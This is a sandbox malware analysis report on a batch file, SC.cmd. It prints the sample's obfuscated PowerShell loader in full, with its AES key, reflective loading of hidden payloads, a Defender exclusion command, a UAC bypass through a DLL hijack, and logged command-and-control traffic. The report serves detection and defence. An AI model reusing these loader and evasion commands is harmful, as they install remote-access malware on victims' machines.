Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC.cmd

Overview

General Information

Sample name:SC.cmd
Analysis ID:1524980
MD5:df146ae56b040ce90f1c879a8282a03e
SHA1:2e6024ad1883b72057dbaf5eaa2ea84656a443cf
SHA256:1e0819a321e43f692e6f2bb08c153ac62b2ae2cbbfb3a1ac7806d55ca3b54df9
Tags:azure-winsecure-comcmduser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: TrustedPath UAC Bypass Pattern
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious command line found
Suspicious powershell command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3428 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2720 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\') MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2256 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 1436 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComputerDefaults.exe (PID: 824 cmdline: "C:\Windows \System32\ComputerDefaults.exe" MD5: D25A9E160E3B74EF2242023726F15416)
      • cmd.exe (PID: 1900 cmdline: "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.exe (PID: 600 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2472 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6360INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x70738:$b2: ::FromBase64String(
  • 0x71e39:$b2: ::FromBase64String(
  • 0x183ed7:$b2: ::FromBase64String(
  • 0x18a115:$b2: ::FromBase64String(
  • 0x18ba07:$b2: ::FromBase64String(
  • 0x18d69f:$b2: ::FromBase64String(
  • 0x2f3aa2:$b2: ::FromBase64String(
  • 0x2f62db:$b2: ::FromBase64String(
  • 0x2f9d63:$b2: ::FromBase64String(
  • 0x2fa1e8:$b2: ::FromBase64String(
  • 0x2da29:$s1: -join
  • 0x2e189:$s1: -join
  • 0x5446f:$s1: -join
  • 0x90884:$s1: -join
  • 0xa6c33:$s1: -join
  • 0xa8476:$s1: -join
  • 0xb54a1:$s1: -join
  • 0xb6fdd:$s1: -join
  • 0xb7169:$s1: -join
  • 0xbb3e7:$s1: -join
  • 0xe83d3:$s1: -join
Process Memory Space: powershell.exe PID: 600INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1f10:$b2: ::FromBase64String(
  • 0x1f3a:$b2: ::FromBase64String(
  • 0xbab0e:$b2: ::FromBase64String(
  • 0xea242:$b2: ::FromBase64String(
  • 0xea26c:$b2: ::FromBase64String(
  • 0x14dc67:$b2: ::FromBase64String(
  • 0x335492:$b2: ::FromBase64String(
  • 0x3e9ea:$s1: -join
  • 0x17e8f8:$s1: -join
  • 0x17f1dd:$s1: -join
  • 0x1fd123:$s1: -join
  • 0x20a1f8:$s1: -join
  • 0x20d5ca:$s1: -join
  • 0x20dc7c:$s1: -join
  • 0x20f76d:$s1: -join
  • 0x211973:$s1: -join
  • 0x21219a:$s1: -join
  • 0x212a0a:$s1: -join
  • 0x213145:$s1: -join
  • 0x213177:$s1: -join
  • 0x2131bf:$s1: -join

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\ComputerDefaults.exe", CommandLine: "C:\Windows \System32\ComputerDefaults.exe", CommandLine|base64offset|contains: , Image: C:\Windows \System32\ComputerDefaults.exe, NewProcessName: C:\Windows \System32\ComputerDefaults.exe, OriginalFileName: C:\Windows \System32\ComputerDefaults.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1436, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\ComputerDefaults.exe", ProcessId: 824, ProcessName: ComputerDefaults.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*y
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5432, TargetFilename: C:\Windows \System32\MLANG.dll
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*y
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 600, ProcessName: powershell.exe
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5432, TargetFilename: C:\Windows \System32\ComputerDefaults.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 600, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5432, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc, ProcessId: 600, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3428, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, ProcessId: 5432, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2472, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T14:52:38.632066+020020355951Domain Observed Used for C2 Detected154.216.20.1327000192.168.2.449736TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T14:52:38.632066+020020276191Domain Observed Used for C2 Detected154.216.20.1327000192.168.2.449736TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\MLANG.dllReversingLabs: Detection: 21%
Source: C:\Windows \System32\MLANG.dllReversingLabs: Detection: 21%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.7% probability
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ComputerDefaults.pdbGCTL source: ComputerDefaults.exe, 0000000A.00000000.1880937307.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe, 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe.3.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1768282215.000001823BF2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdbrzO source: powershell.exe, 00000004.00000002.1769630197.000001823C2E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\uyfguyi\source\repos\Dll1\x64\Release\Dll1.pdb source: MLANG.dll.3.dr, MLANG.dll0.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)2Oa+IP source: powershell.exe, 00000004.00000002.1769630197.000001823C2E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ComputerDefaults.pdb source: ComputerDefaults.exe, 0000000A.00000000.1880937307.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe, 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmp, ComputerDefaults.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb4-)* source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb1S=*r source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbd source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb3+#* source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768282215.000001823BF8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb( source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1769630197.000001823C272000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbiS source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 154.216.20.132:7000 -> 192.168.2.4:49736
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:7000 -> 192.168.2.4:49736
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 154.216.20.132:7000
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: ipwho.is
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: svchost.exe, 0000000F.00000002.3543457635.000002494CA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C878000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
